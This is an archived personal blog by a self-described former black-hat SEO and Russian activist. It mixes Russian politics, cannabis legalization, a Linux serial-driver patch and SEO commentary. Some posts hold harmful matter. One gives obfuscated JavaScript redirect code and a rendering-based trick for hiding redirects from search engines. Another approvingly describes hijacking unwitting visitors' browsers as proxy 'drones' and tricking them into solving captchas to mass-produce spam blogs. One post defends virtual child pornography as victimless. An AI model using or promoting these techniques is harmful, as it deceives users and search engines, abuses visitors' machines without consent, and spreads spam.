SEO black & white

Abkhazian White Widow.

2009-08-15T17:02:00.006Z

I have started a project aimed to sow for White Widow over Abkhazia. Inshallah. Outdoor conditions seems to be good enough for this strain. Political situation in Gal(i) district is also extremely kind.

Dag!

Virtual child porn and a thoughtcrime.

2007-12-08T22:11:00.002Z

Each time has it's own hot topics to attract drain bramaged logic. Its well known fact that an average contemporary brainwashed zombie could be easily controlled by magic word "pedophilia". Contemporary demagogues are aware of that.

The most indicative in this regard is a situation with virtual child porn. Speaking about virtual child porn I mean any porn-related material where no real children were involved in production - e.g. computer generated images/videos, anime, adult models with childish clothes, etc.

Below is a list of countries where virtual child porn is clearly illegal:

Sweden and Norway seem to be one step away from the join to above club (all they lack currently is an actual courts' verdicts). UK is clearly on the way to that club. What about US - situation seems to be complicated and ambiguous, only future will tell which direction they will choose.

While it may be clear that virtual child porn is purely a victimless crime, what may still have reminded hidden after the first glance is that virtual child porn is rather different from common victimless crimes (e.g. drugs, sex work). It lacks not only an actual victim. It either lacks "the object of the crime" - that part is purely subjective. The actual age of the fictional person involved in such a porn material is a nonsense. The actual guilt of someone in this crime is that guilty person can think about fictional child as of real. That is exactly a thoughtcrime.

Yahweh / Сongratulations to Kasparov and others.

2007-11-26T13:08:00.001Z

Kasparov was not the first jailed to short time slice by famous Article 19.3 of the Russian Offences Code ("Disobeying the lawful order of pollice officer"). This article is just a magic helper for authorities and has nothing to do with reality because too often Russian courts don't even bother to check whether order itsel was lawful or not. This is simple enough and seems to be the most used method of jailing Russian political activists.

The full list of 19.3's jailed activists is a big enough to not be fully known to me. Even I in my contemporary history had a record of 19.3's 10 days of arrest (05.05.2007-15.05.2007) during Moscow part of the GMM.

15 days of arrest - the maximum allowed by Russian Offences Code. In the past in Moscow there were two places (known to me) where you can be send during this time.

Special Russian Offences Code jail (Gilyarovsky str, 65, bld. 3). The place where I spend largest part of my 10 days
Remand center at Petrovka 38 - I was there about 12 hours.

Petrovka 38 is less frequent but more comfortable jail. But even in (1) case this is not so problematic place to spend up to 15 days of your life. Boring but safe place.

In the right corner of the room (1) where we were held there was abandoned spider's net. It was not clear whether spider still exists or not but it was clear that no one from us will see him - just as Yahweh. Kasparov was sended to (2) and so spider's destiny still will be unclear to us.

I believe Kasparov will be no more tired from his arrest's days then I was. In fact Russian Offences Code arrest is the most exciting gift any opposition activist can receive from Kremlins. Starting from this time Kasparov is far more reputable to any radical person then it was before. And 5 days in his situation is not so big price as one can think.

More than 4 ports for Digi Neo serial cards in linux.

2007-11-14T14:40:00.005Z

It's kinda hard to describe to any but die-hard unix administrators and embedded software developers how useful thing like serial console is. But it is "widely known in narrow circles" fact that there are quite a lot of problems or work scenarios where serial console is the simplest or even the only possible solution.

Almost any of "widely known in narrow circles" markets have one disadvantage - hardware for them is far more expensive than for an ordinary market. Of course in the simplest case you can just use any regular computer (which usually has two on-board serial (com) ports) as console server. But imagine dozens of unix servers (this is my situation). Existing specialized console servers are just to expensive.

Simple alternative to specialized hardware is multi-port PCI card (or several of them) installed in yet another server.

I use eight-ports Digi Neo at work. The only problem I've have with these cards so far is that vanilla linux kernel supports (via jsm driver) only up to four-port flavour of this card. In fact nothing serious prevents jsm driver from supporting more than four ports. You can check that by applying this tiny patch against current git tree (should also apply with harmless hunks to any kernel version since 2.6.26). For kernels before 2.6.26 use old patch.

At one time ex-colleague of mine even sended this patch to lkml but Scott Kilau from Digi was strongly against it without any good reason (to me).

We have used our patch in production for several years. Hope it will be useful for someone else.

Update: 20081022 12:00 (GMT)
Orignal patch had been broken since version 2.6.26. Due to:

commit 99da9047e675a4a8d671bbd67b34eb096c308b0d
Author: Scott Kilau 
Date:   Thu May 1 04:35:00 2008 -0700

    jsm: add new supported board to jsm serial driver

    Add new PCI Express Neo/JSM board to the supported list of drivers in
    the JSM driver.

So I've ported the patch to the git tree as of 20081022. Original post have been changed accordingly.

legaliz.info has just been resurrected.

2007-10-17T06:20:00.000Z

Strangely enough repressions saga didn't stop after we moved legaliz.info (Cannabis Legalize League) hosting outside of Russia. In the beginning of August 2007 legaliz.info disappeared from the internet. Ukrainian hosting-provider claims that hosting was interrupted after unlawful order of Ukrainian Ministry of Internal Affairs that in turn originates after request from Russian State ("General") Office of Public Prosecutor.

All the issues seems to be resolved now - site is finally moved to US. I hope that US is kinda "Russian State Office of Public Prosecutor"-proof country.

P.S. My wife wrote a bright episode from offline Cannabis Legalize League life.

How do search engines' bots handle javascript?

2007-01-02T19:08:00.000Z

This is a freestyle translation of www.seoweblog.ru: Как индексаторы поисковых систем обрабатывают javascript?.

We've just completed experiment, targeted the real knowledge of how do indexers/bots of different search engines handle HTML code with javascript included within it and javascript redirects in particular.

In our experiment we used high traffic site positioned in google for some popular keywords. On the main page of this site we created links to the (experimental) pages with a different fragments of javascript within each of it. These fragments redirect clients' browsers to the other (destination) pages specially created for this experiment. To be safe destination pages were truly secret and weren't linked with the main site in any way. This way we were sure that bots had came for the destination pages only via experimental pages. All we need to do after that is just look at raw server's log at which destination pages were actually crawled by search engines bots.

At the end of experiment it was clear that Googlebot and other search engines' bots were able to correctly handle almost any variants of javascript redirects, i.e. bots had crawled destination pages and pages were appeared in the search engines' index. Below are concrete examples that were correctly interpreted by bots:

In the first example processed by indexer we see plain redirect code:

<script language=”JavaScript”> document.location.href = “http://www.site.com/directory/1.html”; </script>

Second one was redirect executed by encoded script:

<script language=’JavaScript’>var str = ‘wbs%21s%3Eepdvnfou%2Fsfgfssfs-u%3E%23%23-r%3C %0B%21%21%21%21%21%21%21%21%21%21%21%21%21%21 epdvnfou%2Fmpdbujpo%3E%23iuuq%3B00xxx%2Fbetpgu.efwfmpqnfou %2Fdpn0uftukt03fod%2Fiunm%23%3C’; str = unescape(str); res = ‘’; for (var i = 0; i < str.length; i++){ res += String.fromCharCode(str.charCodeAt(i)-1); } eval(res);</script>

In the third example indexers were required to process part of the script inlined in iframe (and they did it correctly):

<iframe xsrc=”http://www.site.com/directory/f.html” width=”100%” height=”100%” frameborder=0 hspace=0 vspace=0 marginwidth=0 marginheight=0 allowtransparency=true scrolling=no> </iframe>

But there were exceptions. Below is two javascript examples could be used for redirecting client browsers that search engines do not understand (i.e. seo safe).

On the first page redirect was done in a manner that allows to execute it only by client's browser or a bot with html code rendering capability. Example (slightly modified) code is:

<table width=”100%”> <tr> <td id=”first”>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> </tr> <tr> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td>aassssssdddddffffgggghhhhjjjkklll</td> <td id=”second”>aassssssdddddffffgggghhhhjjjkklll</td> </tr> </table> </div> <script language=”JavaScript”> var D=document; function AbsPos(O, Parent){ var X=0, Y=0, Next, D=document; Next=O; if (Parent==null) Parent=D; while (Next!=null && Next!==Parent){ Y+=Next.offsetTop; X+=Next.offsetLeft; Next=Next.offsetParent; } return [X, Y]; } var first = AbsPos(D.getElementById(’first’)); var second = AbsPos(D.getElementById(’second’)); if (first[0] != second[0]) { document.location.href = “http:/’+'/www.site.com/directory/t.html”; } else { document.write(’whatever‘); } </script>

The experiment has shown us that search engines bots do not have rendering capability (and this is understandable). That fact could be used by anyone who wants to have redirect either executed by alive users and not accounted by (hided from) search engines' bots.

In the second example redirect is triggered by an "active window" event:

<script language=”JavaScript”> function f(){ document.location.href = “http://www.site.com/directory/x.html”; } window.onFocus = f(); </script>

Of course bot didn't follow (crawl, index in turn) this redirect because it don't have such capabilities (again).

In the next special example:

<script language=”JavaScript”> function rnb() { http://www.site.com/directory/abc.html } </script>

were URL was simply inlined in javascript (without any redirect) we have verified that bots didn't follow the URL. This means that search engines' bots (Google and others) do indeed correctly "execute" javascript and see the result of it's execution. But the subset of javascript they support is limited. E.g. they haven't have rendering capability yet.

Our conclusions

Bots of the main search engines (Google in particular) do support some subset of javascript. I.e. in general they are able to distinguish between normal javascript (that is part of dynamic html page) and sneaky redirects. But there is still a possibility to create sneaky redirect unnoticed by the search engines. E.g. you could exploit the difference between a real html browser and and se bot (last one haven't have rendering capability yet).

Only .6% of Matt Cutts' readers are from Russia.

2007-01-01T22:38:00.000Z

According to Matt Cutts' reply (hint: search for "Update:") to my question about geo location distribution of his blog readers the Russia's share of his readers is only about .6%. That surprised me only at the first glance. While I agree with the very popular anti-spammer's opinion that Russian speaking countries (and Russia is the biggest one) is among of the main sources of black hat techniques (one xenophobe even suggest to simply: "deny from .ru") the funny thing I notice every time I'm reading over Russian sites focused on seo is that Russian natives very rarely rely on rather well known to English speakers facts.

A good example is the comment where one mention google toolbar as possible reason for Googlebot crawling a page while Matt Cutts has already written comprehensive post shows that google toolbar "doesn’t lead to page being indexed". This is the main issue that distract me from the love of my own country - the average level of escapism and ignorance of the other world is too high currently.

On the other hand the fact that at this level of escapism Russia is still very visible as black hats' home is only mean that search engines haven't yet archived the desired level of spam resistance.

P.S. It seems that Matt Cutts' blog is experiencing MySQL problem currently:

WordPress database error: [Can't open file: 'wp_comments.MYI' (errno: 144)]
SELECT * FROM wp_comments WHERE comment_post_ID = '538' AND ( comment_approved = '1' OR ( comment_author = 'Sergey S. Kostyliov' AND comment_author_email = 'rathamahata@gmail.com' AND comment_approved = '0' ) ) ORDER BY comment_date

I.e.:

rathamahata@x ~ $ perror 144 MySQL error code 144: Table is crashed and last repair failed rathamahata@x ~ $

so link to "my question" temporally points to the entire post. I'll change link when mysql problem goes away.

Update: 20070102 18:03 (GMT)
MySQl problem at Matt Cutts' blog has been resolved. Link has just been changed to a correct one.

YahooFeedSeeker does use Google Blog Search Pinging Service?

2006-12-24T17:28:00.000Z

I am currently playing with Google Blog Search Pinging Service. While looking at the raw logs I've noticed the yahoo's YahooFeedSeeker came to my site right after the Googlebot:

66.249.72.67 - - [24/Dec/2006:19:35:46 +0300] "GET /sitemap.xml HTTP/1.1" 200 251 "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" qwerty.legaliz.info "-"
216.39.58.17 - - [24/Dec/2006:19:43:15 +0300] "GET /sitemap.xml HTTP/1.0" 200 251 "YahooFeedSeeker/2.0 (compatible; Mozilla 4.0; MSIE 5.5; http://publisher.yahoo.com/rssguide)" qwerty.legaliz.info "-"

I haven't sent any other blog pings (i.e. I did _only_ manual ping). So I suspect that YahooFeedSeeker does use changes file exported by google in some way.

Internet censorship case (IP delivery is different from cloaking).

2006-12-21T11:42:00.000Z

Qwerty - one of the local Moscow internet provider have just firewalled Cannabis Legalize League (CLL) for it's customers (regular Russian citizens). This is the second case of repressions over CLL inspired by the Russian authorities. First one was mail with threats from Russian DEA analog sent to hosting provider where CLL site used to be hosted for a while - due to this incident CLL site was migrated to Ukraine.

To workaround current issue I've configured custom mirror/proxy of CLL site provides different views on specially created third-level domain for:

Qwety's customers.
Any from within internet censorship free world.

P.S. For googlers and antispam radicals. This is not a cloaking. This is an example of correct usage of an IP Delivery technique. In case any have better ideas on how to workaround internet censorship cases your comments are highly appreciated. Below is mod_rewrite excerpt from my httpd.conf:

  RewriteEngine On
  RewriteCond %{REMOTE_ADDR} ^87\.240\.[01][12345].*
  RewriteRule (.*) http://legaliz.info/$1 [P,L]

News from the streets of Moscow.

2006-12-14T16:45:00.000Z

Prices of effective marijuana have raised up. Again. Now it is even more expensive than gold - $50 per 2 grams.
The most exciting sound you can hear at opposition political action this autumn/winter comes from alive Buddhists.

Moscow government prohibited "Killed Journalists Remembrance Marсh".

2006-12-12T15:07:00.000Z

A friend of mine Maria Smirnova aka Мария Смирнова (one of the members of the coordination committee) have just confirmed to me that Moscow government prohibited Killed Journalists Remembrance Marсh (link is in Russian). Marсh was scheduled at October 17 2006.

For those not familiar with the Russian law I have to add that Russian Constitution and Federal Law #54 in turn don't give any right for a local government to prohibit a public action.

P.S. The speed of backlinks growth for such a political projects is amazing. Clearly Russian politic is the weirdest case of the white hat seo I've ever known. There is no so much need to be a black hat when social spam is so effective.

The whole captcha concept is doomed.

2006-11-16T15:48:00.000Z

Someone left a comment about a workaround for one of the possible captcha killers:
Hey, Sergey, there is quite easy workaround for such captchas cheating. Captcha owner should just include his domain name into captcha. And he could do it the way you could not masquerade it (as watermark over characters or something similar). Of course when you are smart and unique, no one site owner would do that. But when it became usual spam practice, owners will defend.

Sure, domain name embedding will guard captcha up to the safe level in the ideal world. But the real world is different from the ideal one. It is almost the same situation as with "authentic microkernel vs real OSes". While microkernel OSes are more ideal from the methodology angle of view the largest part of the real OSes are not microkernel. It's because humans are not ideal at all.

In the real world domain name embedding:

Will made captcha encoding by humans more harder. The web is already full of complaints about current captcha implementations. Captcha surely will not benefit from adding additional complexity for humans.
Has a workaround for it. Spammers will be required to register mistyped domains for their targets. Sure, the convertation will be a bit lower but still practical, I suppose.

The _whole_ captcha concept is doomed! Captcha is just yet another variant of cybersquatting prevention method. Rather complicated to me to live quite long. It's complexity (either current or suggested) will not safe it.

Have just switched to blogger beta.

2006-11-09T16:00:00.000Z

And now I've got two problems as a bonus:

Sitemap's errors (Google Webmaster tools) of two types:
1. Your Sitemap or Sitemap index file doesn't properly declare the namespace.
2. This url is not allowed for a Sitemap at this location.
My blogger's profile doesn't work anymore. (Update 20061212: It seems that bug affected my profile was fixed. It works now.)

Livejournal is down, Russian March is dead.

2006-11-04T13:36:00.000Z

Slow Saturday... It intended to be very news rich in Moscow but it doesn't so. For haven't yet been detailed reasons livejournal.com (livejournal, LJ, живой журнал, ЖЖ) have experienced outage since Moscow morning.

Of course, time of outage correlates with US night well enough. Independently of the real details of the outauge this is very helpfull for russian security forces. It seems they've just finally secured so called Russian March.

Cross-linked second level domains network internet graph will lost.

2006-11-02T19:50:00.000Z

Jerzy mentioned one real problem that possible censorship politic change on "russian" livejournal part will trigger.

For non-authentic humans language it sounds like: Global internet graph will lost authentic humans created(peoples from seo are not authentic) cross-linked network of second level domains from one host. Internet will lost a bit of humanity. Bit belongs Six Apart/SUP.

If SUP are really thinking of more tight censorship they have just been commited commercial suicide. Killing of what they own can be non-ethical for readers - part that consumes humanity. Sad. But, if that affected readers part is big enough - time to build legal doorways by mirroring censored (but haven't yet migrated to any host) chunk of livejournal.com. Authentic humans will like it.

SUP, Go8 and anarcho-capitalism.

2006-10-27T23:36:00.000Z

I should probably write about current russian blogosphere - it becomes a hot topic.

As many know, Six Apart announced their partnersip with russian SUP company for their livejournal.com blog's hosting. Many, especialy residents of Russia, having in mind who really SUP are, afraid that it could be a first step, a base for a further compaign of political repressions over russian bloggers hosted on livejournal (largest part of russian blogosphepre in fact). But I think that there are several niches hided behind the political repressions of writers(bloggers) one. What may looks like a sign of possible repressions over russian bloggers is actualy only one part of problems that may arise in russian internet segment in future.

If fact current problem is not dangerous at all. Until there are still enough blog hostings around the world that are not under _any_ control the key factor of internet freedom in Russia is not an ability to write to some blog hosting (even lagest part of russian blogoshere) but the freedom to write.

To be short, in the most paranoic case: a hardest legal attack from russian government (crypto criminalised, total internet censhorship established) against all over internet business in Russia it will only hurt legal part of that business. Without other world support any local attack on crypto will not successed and censorhip system will not be total at all. An illegal market will in a jiffy accepts all the parts that a legal one has lost.

Until the first attempts of russians government to restrict network connects from Russia to the other world (or any other variants of mangling outer world view from inside russian internet segment) there are not enough reasons for many non-russian human rights or political organisations to look at things like SIX Apart and SUP partnership.

Any imaginable level of madness that could come from SUP is enough only for creating temporary problem. Even if all russian residents will loose ability to publish on livejournal.com some day, next day all of them will migrate to other blog hostings. There always will be enough blog hostings not affected by any doze of any control of The Bloody Russian Regime.

Non-russians, please, don't fight with temporary problems (like SUP), temporary problems are just attractive source of money and nothing more, they will never die - they will always ressurect untill you finally kill economy.

All that is needed to guarantee freedom to write on russian (the same logic is applicable to any other coutry too, btw) blogoshpere no matter of russian government activity and madness is just two things:

An ability for russians to cross russian internet border. I will write about a possible way below.
"The Bloody Russian Regime"-free blog (and any other) hostings outside the russian borders. Already done.

Speaking about crossing russian internet border. If access from russian internet segment to the outer world is not mangled or restricted (this is true currently, and as I've already said this is the only one internal russian subject that non-russian human rights or political organisations should look at) all other parts will not require any cooperation with the russian government. Below is just one example of possible working scheme.

Allow russian residents to take a part in global internet business, this will eliminate the influence of any possible economic sanctions from the russian government. Do not share information of russian residents internet activity (no matter business or not) outside the russian border, to eliminate the influence of any possible political sanctions. That will create an ability for russians to not depend on government in their ways to access and use of an internet. In the worst case free (as in freedom) access to the internet will become the part of illegal (in Russia) market, unless there are legal (outside of Russia) finance sources invisible for russian government this is not a problem.

There are plenty of such possible schemes. All of them including example above could be named as legal for outside of the country border angle of view, anarcho-capitalism like part of economy isolated frоm the country government. In fact schemes like that have been already working for ages. Е.g. SEO as any of small anarcho-capitalism style of doing business is something that actualy prevent Russia from collapse more than huge semi-fairly-legal businesses like oil and gas. They are just misses "legal for outside of the country border angle of view" part. This is not immanent problem of many of such a schemes/businesses. This is just drain bramage of paranoics constantly busy to legislate and partly criminalize everything new they hear and see. In case of "politican" variant of paranoics this could be fatal. So, please! Say "No!" to any colloborative initiatives on global internet economy from the Go8 and others.

Do not get fooled. SUP are not an enemy of freedom to write in Russia currently. No matter how weird or nice they are. To treat them as such they should be an IT monopolist company in a real mondialistic world (one Earth - one state). Until they aren't even near that position you could always choose another blog hosting - free enough for you, no one force you to choose livejournal.com. The real enemies are Legislation and Criminalization fun clubs with a hunting license (for a hunt on libertarian economy) in different countries, usually inside the governments and near.

Depoliticize internet economic all outside Russia and the freedom to write will never die for us: russian residents. It is all in our and yours interests.

AJAX proxy (semi-alive traffic convertation).

2006-10-20T14:01:00.000Z

When I used to be involved in smtp spam some colleagues of mine solved their problems with smtp relays in original way. Self written php smtp over http proxies was the solution. Php enabled hostings were cheap enough and their technical stuff was lazy enough. I don't think that possibility of that have changed a lot.

But I think there are much more interesting things on the horizon. It is all about old business - traffic convertation. There are far less profitable (if count "alive's" visits) traffic sources then for traffic comes from search engines:

CJs from adult web.
"Reject traffic" from any traffic acceptor.
Just unknown, very cheap, potentially alive (and potentially bots :) traffic you bought somewhere.

I should said that it all depends of your estimation of aliveness. I have a good example. This is one of the members of permanently ongoing activity I call: Fractal project. One practical example is decoding captchas using humans as decoders. In simple scheme any attribute that can be treated as non-profitable (e.g. China's traffic for something limited to US) triggers redirect to feed where user see anti-bot yahoo like message (claiming that user is possibly robot). To prove authentic humanity user should decode captcha (nothing new). But the captcha used in fact is fetched from blogger (AJAX is wonderful technology). After that we have yet another series of blog in blogger we could use for splog's creation, splogs also gives some constant backlink's (with medium period of live, because splogs are constant targets for baning) stream, good enough for some others splogs/doorways. At the time I had left these experiments speed of splogs creation was about 2k/day.

But the most exciting to me theoretical possibility is http proxy tunneled over AJAX capable clients (e.g. regular web surfer aka drone). All you need is just custom proxy server that accepts drones (nodes) ready to process regular http queries (in surfer's context, due to AJAX, not server one) and js code for drones. Custom proxy server should do two thins:

To acts as regular http proxy for you. Every incoming http proxy query should be inserted in the queue.
Second task is queue processing. Server simply offloads queries to AJAX capable alive drones when they arrives.

In drone context it just some code that executed by javascript engine of http client (say browser). While drone stays at the your http proxy feed it could process server queue several times.

All you need is just guaranteed bandwidth (~drones/s).

Btw, captchas decoding could be combined with AJAX proxy. All the time drone spend decoding capcthas (s)he could also acts as http proxy. There is possibility to constantly lie that dron decoding of a captcha is wrong and send him(er) another one, until drone will be tired.

Web 2.0 is coming and I enjoy it.

Guests.

2006-10-20T00:06:00.000Z

I had new visitors:

From Palo Alto (20061018).
Next day someone with referer: "http://reactor.corp.google.com/reader/view/".

Google escapism: openid ignorance.

2006-10-17T18:20:00.000Z

Google is amazingly open company. They share a lot of internal information. My favourite one source is seo library. But their openness is one direction mainly. They allow others to follow them (by sharing their docs, specs, standarts, scientific papers, etc) but not always influenced enough by things from the outer world. The most visible symptom is their ingnorance of openid for at least two of their services: Google Webmaster Tools (google sitemaps) and Blogger.

Google Webmaster Tools (google sitemaps) allows to verify that site is under user control by two possible methods:
1. By creating unique named file in the server root of your web host.
2. By inserting an unique meta tag in the HEAD of index page of your web host.
Both methods are light and flexible enough for any technical person but openid already does exactly the same: i.e. provides a method to verify that url(==hostname in this case) is under someone control. Furthemore, openid is more user friendly because many vendors and providers (e.g. blog engines and blog hostings) does already have built-in openid support.
Blogger - a very popular blog hosting simply lacks openid support that makes it less usefull for a user wishes to use its blogspot url as openid url for many vendors and hosting that support it and so lowers user ability to cross blogspot boundary by commenting on many others (not blogspot's) blogs.

If both Blogger and Google Webmaster Tools will support openid it will automatically gives Blogger users a way to verify their blogs for Google Webmaster Tools (without need to edit blog template by hands) as a bonus.

For whom the bell tolls.

2006-10-14T08:17:00.000Z

I firstly saw Anna Politkovskaya at September 03, 2006 around and in "Kitay-Gorod" Police department. I cover a bit of this story in my previous post. She wrote article about this (Russian) for "Novaya Gazeta" (one ot the last free ones russian newspapers). Unfortunately the fist time was the last one (besides funeral). Due to the four bullets in the elevator to her flat at October 07, 2006. About one hour after the murder we got an incoming call: Anna Politkovskaya was found dead.

This was kinda point of no return: no more logic reasons to stay inside the country but the revenge feelings. The sound was clear: "..never send to know for whom the bell tolls; it tolls for thee.".

After the week it was clear - abnormal logic had damaged even full incoming information thread. It spreads even over the versions of the murder. The most attractive for me is a link to GRU. GRU is kinda old structure. Just one year younger than some countries like Finland. GRU is mostly invisible for the westerns currently. The only one visible part is the funniest one: "Восток" & "Запад" ("East" & "West") battalions of the GRU (mostly formed from chechen's collaborationists) are russian part of UN Forces in Lebanon.

Political activism in Russia (after the seo).

2006-09-16T23:57:00.000Z

Unfortunately I am unable to complete the promise I made in my last own comment. I left seo at the begining of april 2006. So I don't want to speak anymore about any material based on too personal experience.

There is not so much interesting about my current work, sorry. But there are a lot of things happen related to streets politic in Russia.

I will stop comment on any aspects of seo besides political in this blog. Furthermore, I plan to write about some political activity I take part in and so to change blog topic a bit.

Here is in order:

Here is some photos from the last action. Court is scheduled at 20060919 (from money penalty to 15 days in jail, most probable is money penalty). Sorry, the post I linked to is in russian.
It seems that russian became well known language for antispammer fascists world. Russian language is still new for this world. Here is wrong translation of Ann Elisabeth from russian:
"Реклама, распространяемая по сетям электросвязи и размещаемая на почтовых отправлениях".
In fact correct translation is not:
advertising distributed via electronic networks.

but:
advertising distributed via "сети электросвязи" and via regular postal system.

"сети электросвязи" is wrong to short to "electronic networks" as Ann did. There are concrete examples of what "сети электросвязи" means in this law. See below:
"Статья 18. Реклама, распространяемая по сетям электросвязи и размещаемая на почтовых отправлениях

1. Распространение рекламы по сетям электросвязи, в том числе посредством использования телефонной, факсимильной, подвижной радиотелефонной связи, допускается только при условии предварительного согласия абонента или адресата на получение рекламы...

So it is not "electronic networks" but "phone, fax, mobile phone". I.e. completely unrelated to mail/im/web/p2p spam.

Google's "No" to US government request for search engines logs

2006-01-19T22:06:00.000Z

Many of my words about SEO have strong libertarian smell. It is kinda hard to explain that my black hat nature is not a direct reason for that. In the past I tried to write about possible reasons for my libertarian view on SEO mostly from Russian citizen angle of view. It seems I wasn't successful. I think that US President Bush Administration have just helped me to highlight things I am afraid of. US is much obvious to many westerns than Russia and current issue is directly related to search engines. Kudos to google!

[Biased terminology] Spamvertzied keywords

2006-01-17T10:30:00.000Z

I've just found very good example of biased terminology in the
JoeChongq's comment on his own post (which is actually a reply to my previous post). I'm speaking about his term "spamvertzied keywords" (I think this means spam advertized keywords). There is no such thing per se. There are only profitable (more or less) keywords. The more particluar keyword profiltable the more it attractive to any seo guys and girls (including linkspammers). But this is just the consequence of keyword profitability and nothing more.

Warlordism.

2006-01-07T11:50:00.000Z

Update: 20060111 09:05 (GMT)
My opponent wrote about his own view on the problem. I suggest you to read him first. To me his unability to share any fact that cantradicts with my writing just proves my own words. Thank you, JoeChongq . I wish you peace.

First they Ignore you.
Then they they Laught at you.
Then they Attack you.
Then You Win.
-- Mahatma Gandhi

Besides white (one colour of gray if you want) hats and black (another colour of gray) hats there are thirds - seo warlords. This part benefits from any disagreement of the first two sides, being mostly unnoticed by the both.

Have you ever heard about warlords? In the real life the safest place to see an alive warlords is Transnistria from Europe.

Lets introduce examples of the seo warlords sites:

The doorway of the warlord matt.
Why I call it doorway? Because it clearly violated this:
* Don't load pages with irrelevant words.
part of google's webmaster guidelines. Look at this doorway's page
And the Joe's doorway.
The same violation as for the #1. Please look at the keywords links at the very bottom of it's rightbar

Note many irrelevant (for an ordinary users) backlinks on the both sites. Some of them are very hot se keywords.

The funniest is that their backlinks in most share the same beneficiary - *.chongqed.org domains and #1 have a direct backlink to #2, though #1 and #2 seem not to be affiliated on the persons level (according to personal email from #2). I should note that I know #2 for a long time and haven't even realized that it violates google's guildlines (from my angle of view) untill discovered #1.

Guys and girls, war on any thing don't give you any right to violate guidelines. Anchor text contains (suprisingly!) - words. There is no exception in guidlines for this type of inlined words for cases when you selling links, "hating" something, fighting against something, or just use any keyword as link anchor text and abstain from vote about any affilation of backlink<=>text pair at the same time, though in clinic psychology terms this is reflection of partucular association type which is (type) one of the most known symptom of schizophrenia (of course any one symptom is not enough to clarify diagnosis :). But in reality google does provide you with a primitive (rel="nofollow") at least for backlinks. You can inline any irrelevant text (for an ordinary user) in backlink and give search engine a hint about it's possible irrelevance. Even though this in only semi-solution. Warlords sites don't use rel="nofollow" primitive for a many clearly irrelevant backlinks.

These two self-elected warlords (this is usual for warlords) are worse than any of both black and white hats to an average user outside of SEO, because their clear target is serps pollution (again, from the average user's point of view) in the name of the antispam fight.

[RFC] Cloaking in a good and safe manner (Why rel="nofollow" is just a semi-solution).

2006-01-06T14:42:00.000Z

If you have ever read any SEO blogs or just any other regulary updatable sites about SEO you've probably already seen that many of them are polluted with many various keywords. Here is a good example of keywords pollution (note many gambling keywords all over the page).

According to google's webmaster guidelines I could be treated as a person violated this:
* Don't load pages with irrelevant words.

Did I really violate guidelines?

It depends on the angle of view. In my opinion it is just a missing part in google's code (and in turn guidelines). As always: "The road to hell is paved with good intentions", and google is not an exception. To me all keywords I inserted in mentioned page should be there - it is just very natural for a humans to use real examples speaking of any thing. In case of the SEO gambling keywords (and any others, btw) are relevant examples. But I do understand the intentions behind google "irrelevant words" cite. They don't want count such seo's example keywords for their strightforward meaning for an ordinary persons (i.e. as gambling keywords not as seo's keywords examples) and so positioning them for gambling keywords. And I fully appreciate it.

What is a problem? Googlers have already shown that they understood that real live is more sophisticated than their short abstract guidelines. I am speaking about Matt Cutts' interpretation of rel="nofollow" backlink's attribute. I like his short explanation of rel="nofollow" as a way to abstain from editorial vote. Without his explanation it is possible to misunderstood rel="nofollow" concept. For example it would be possible to interpret that google contradicts with another part of it's own guidelines:
* Don't employ cloaking or sneaky redirects.
Because rel="nofollow" does exactly what cloaking means. I.e. delivers different views to a humans (these don't see rel="nofollow") and to search engines (those ones do). But with Matt's explanation it is clear that this is just a hint for a search engine in situation when peoples are not required to have such a hint. Peoples are smart and will understood what is going on anyway - from the surrounding context of backlink E.g. hints like strings:

comments
trackbacks
sponsored links
this evil person have just spammed my blog
etc...

are enough for any human.

But rel="nofollow" is just a semi-solution not a full one. The whole internet is just a graph of nodes - pages (mine and others) binded by backlinks. Any of us have been already granted by search engine whether to vote about other nodes or to abstain from a vote (i.e. to put rel="nofollow" attribute or not). Let peoples decide about their own nodes (any part of them) not only about nodes of others...

So what I suggest?

I think that support of e. g.
<div id="myid" rel="not4se">...</div>
syntax will be enough, but I don't care about actual implementation.

Of course all I wrote in this post apply to all search engines (IIRC yahoo and msn have already stated that they support rel="nofollow", not sure about ask...) not only to google. Google and googlers (hello Matt!) is just happen to be most open to a dialog with webmasters currently.

Btw, the whole problem is far wider than just seo keywords - it is all about a hints for a non-humans (i.e. search engines) about any word/phrace/text/content that is used outside of it's strightforward/dictionary connotation.

Any comments are highly appreciated. I know that some of my readers are rather sceptical about me due to my black hat nature (in their eyes). Please forget about black & white while your are reading this post...

Schoolboys on the air.

2006-01-03T17:38:00.000Z

I've just returned from my usual daily run across the SERPs and I've got a news for you: russian-speaking schoolboys massively entered many industries they had never tried on a regular basis before end of the summer 2005. I spent so many hours on summer investigating SERPs (that was beginning of my SEO career) so I'm sure that situation had changed... changed a lot.

Why I call them "russian-speaking schoolboys" and what are the industries they entered in? I'll give you an example. I don't like site-calling (for a various reasons) so I'll give you a hints. These hints will be not clear for a person not-familiar with professional SEO and this is intentional.

Example is a freebie redirect site from some Eastern Europe (but EU) country's domain zone that have just entered second google's SERP for very hot gambling keyword. I and google traffic estimator both think that it is the hottest non-poker gambling keyword. Google traffic estimator thinks that it costs aprox. $1k/day (actually a bit more ;). Google thinks that it knows aprox. 30.5M pages related to this keyword... Ok. Industry should be clear. But why do I think that he/she is a "russian-speaking schoolboy"? Because he/she sends traffic to a public (not advanced) umax ppc feed. Backlinks are guestbooks only. This means that:

He/she is a native russian-speaking at a high probability. Why on earth should others choose umax for a gambling traffic?
He/she hasn't yet earned his/her first $100 in SEO but is still trying ;)
He/she use not his/her own tools but some stupid programs so broadly known to "russian-speaking schoolboys".

